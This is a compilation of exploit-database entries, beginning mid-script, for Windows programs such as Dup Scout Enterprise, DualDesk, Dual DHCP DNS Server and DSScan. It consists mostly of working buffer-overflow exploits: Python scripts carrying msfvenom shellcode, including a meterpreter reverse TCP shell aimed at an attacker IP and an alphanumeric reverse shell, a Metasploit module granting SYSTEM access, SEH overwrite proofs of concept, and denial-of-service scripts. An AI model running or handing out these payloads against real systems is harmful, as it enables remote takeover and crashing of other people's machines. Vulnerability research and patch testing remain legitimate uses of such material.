buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"

buffer = "\x41" * 260
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 20
buffer += buf
buffer += "\x90" * (10000 - len(buffer))

evil =  "POST /online_registration HTTP/1.1\r\n"
evil += "Host: " + sys.argv[2] +"\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled. 
# Exploit for older version: https://www.exploit-db.com/exploits/40832/

#!/usr/bin/python
 
import socket,os,time,struct,argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

host = args.host
port = 80

# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
shellcode =  ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"

buffer  = "\x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
buffer += "\x90" * (10000 - len(buffer))

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python
import struct

########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode
# Date: 29-11-2017
# Software: Dup Scout Enterprise
# Version: v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested on: Windows 7 x86
########################################################################################################


'''
[+] Paso 1
Bytes Validos:
\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a
\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f
\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65
\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75
\x76\x77\x78\x79\x7a
----------
[+] Paso 2:
Align ESP:
popad * 49
----------
[+] Paso 3:
Assembly Align EAX:
xor eax,eax
push esp
pop eax
pop ecx
add eax 1c
jmp eax -----> (inicio shellcode)
----------
[+] Paso 4:
Codificacion:
and eax,554E4D4A
and eax,2A313235
sub eax,65656565
sub eax,65654C65
sub eax,54363176
push eax
sub eax,33354D35
sub eax,2A707737
push eax

Byte Paste:
254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50
'''

popad = "\x61"*49
alignEsp = popad+(
	"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31"
	"\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C"
	"\x65\x65\x2D\x76\x31\x36\x54\x50\x2D"
	"\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A"
	"\x50"
	)

'''
msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw)
msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed  BufferRegister=EAX -f python
'''
shellcodeTest = (
	"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A"
	"BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk"
	"42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw"
	"LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS"
	"wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam"
	"7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi"
	"QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB"
	"Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL"
	"eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA"
	)

#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed  BufferRegister=EAX -f python
shellcode  = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45"
shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b"
shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66"
shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47"
shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35"
shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f"
shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62"
shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c"
shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66"
shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71"
shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30"
shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71"
shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68"
shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d"
shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31"
shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56"
shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43"
shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50"
shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31"
shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f"
shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31"
shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58"
shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62"
shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68"
shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53"
shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30"
shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51"
shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f"
shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56"
shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58"
shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53"
shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45"
shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64"
shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c"
shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59"
shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69"
shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31"
shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76"
shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e"
shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64"
shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71"
shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38"
shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d"
shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50"
shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49"
shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78"
shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37"
shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50"
shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30"
shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"

offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest))
nseh   = "\x71\x20" # jno short 34
nseh  += "\x70\x20" # jo short 34
seh    = struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (Bytes Buenos)
junk   = "\x42"*26+alignEsp+"\x42"*6000

payload = offset+nseh+seh+junk

print "\nSize Buffer: "+str(len(offset))
print "Size Payload: "+str(len(payload))
print "\n--------------EXPLOIT--------------\n"
print payload
print "\n----------------------------\n"

file=open('poc_dup.txt','w')
file.write(payload)
file.close()

# @s1kr10s
HireHackking 
#!/usr/bin/python

#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer
Overflow
# Date: 29-09-2017
# Website: www.touhidshaikh.com
# Contact: https://github.com/touhidshaikh
# Vulnerable Software: Dup Scout Enterprise v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Version: v10.0.18
# Software Link:
http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
#   1. right Click, click on Import Command
#   2. select evil.xml , Booom Calc POPED up.. ;)
#========================================================================================================================


import os,struct

#offset to eip
junk = "A" * (1560)

#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)

#NOPS
nops = "\x90"

#LEA   EAX, [ESP+76]
esp = "\x8D\x44\x24\x4c"

#JMP ESP
jmp2 = "\xFF\xE0"

#Jump short 5
nseh = "\x90\x90\xEB\x05"

#POP POP RET
seh = struct.pack('<L',0x6501DE41)

#CALC.EXE pop shellcode
shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"


# FINAL PAYLOAD
buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
* 10 + shellcode


#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
'\n</classify>'


f = open('evil.xml', 'w')
f.write(file)
f.close()
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dup Scout Enterprise Login Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Dup Scout Enterprise
        10.0.18. The buffer overflow exists via the web interface during
        login. This gives NT AUTHORITY\SYSTEM access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Higgins', # msf Module -- @ch1gg1ns
          'sickness' # Original discovery
        ],
      'References'     =>
        [
          [ 'EDB', '43145' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
        },
      'Targets'        =>
        [
          [ 'Dup Scout Enterprise 10.0.18',
            {
              'Ret' => 0x10090c83, # jmp esp - libspp.dll
              'Offset' => 780
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Nov 14 2017',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(80)])

  end

  def check
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    print_status("Generating exploit...")

    evil =  rand_text(target['Offset'])
    evil << [target.ret].pack('V')
    evil << make_nops(12)
    evil << payload.encoded
    evil << make_nops(10000 - evil.length)

    vprint_status("Evil length: " + evil.length.to_s)

    sploit =  "username="
    sploit << evil
    sploit << "&password="
    sploit << rand_text(evil.length)
    sploit << "\r\n"

    print_status("Triggering the exploit now...")

    res = send_request_cgi({
      'uri' => '/login',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'content-length' => '17000',
      'data' => sploit
    })

    handler
    disconnect

  end
end
HireHackking 
# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.dupscout.com
# Software Links:
# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe
# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe
# Tested Version: 13.5.28
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

Dup Scout Server   Dup Scout Server  C:\Program Files\Dup Scout
Server\bin\dupscts.exe    Auto
Dup Scout Enterprise   Dup Scout Enterprise  C:\Program Files\Dup Scout
Enterprise\bin\dupscts.exe    Auto

C:\>sc qc "Dup Scout Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Dup Scout Server
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
Server\bin\dupscts.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Dup Scout Server
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\>sc qc "Dup Scout Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Dup Scout Enterprise
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
Enterprise\bin\dupscts.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Dup Scout Enterprise
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security          
 

Vendor:
===============
www.dualdesk.com



Product:
===========
DualDesk v20

DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your
technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no
configuration. 



Vulnerability Type:
===================
Denial Of Service



CVE Reference:
==============
CVE-2018-7583


Security Issue:
================
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application 
which listens on TCP Port 5500 by sending a long string of junk chars.

(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404          add     esp,4


Exploit/POC:
=============
Start the Dualdesk Run Proxy as Application.

C:\>python -c "print 'a'*8000" > crash.txt

C:\>type crash.txt | nc.exe localhost 5500

Crash!!!


Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
=============================
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
HireHackking 
# Title :  Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)
# Date : 07/12/2016
# Author : R-73eN
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
# Vendor : http://dhcp-dns-server.sourceforge.net/
# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
# Vulnerability Description:
# The software crashes when it tries to write to an invalid address.
#
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
# MOV DWORD PTR SS:[ESP+4],31              
# MOV DWORD PTR SS:[ESP],1 
# .........................
# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.
#
# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe 
# contains 00 which is a badchar in our case.
#

import socket
import time
import sys

banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner

host = ""
port = 6789

def send_request(host,port,data):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		s.connect((host,port))
		s.send(data)
		print "[+] Malicious Packet Sent [+]\n"
		
	except Exception:
		print "[+] Exploit failed . . .[+]\n"
	s.close()

	

ebx = "BBBB"
eax = "CCCC"
evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400

if(len(sys.argv) < 1):
    print '\n Usage : exploit.py ipaddress\n'
    exit(0)
else:
    host = sys.argv[1]

#The method doesn't really matters. It gets valideted only about the length
request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
send_request(host,port,request.replace("{REPLACE}",evil))
HireHackking 
#!/usr/bin/python
# Exploit Title     : DSScan v1.0 Hostname/IP Field SEH Overwrite POC
# Discovery by      : Anurag Srivastava
# Email             : anurag.srivastava@pyramidcyber.com
# Website	    : http://pyramidcyber.com/
# Discovery Date    : 18/08/2017
# Software Link     : https://www.mcafee.com/in/downloads/free-tools/dsscan.aspx#
# Tested Version    : 1.00
# Vulnerability Type: SEH Overwrite POC
# Tested on OS      : Windows 10 Home x64 
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
 
#SEH chain of main thread
#Address    SE handler
#0019F900   43434343
#42424242   *** CORRUPT ENTRY ***

 
# Offset to the SEH Frame is 560
buffer = "A"*560
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()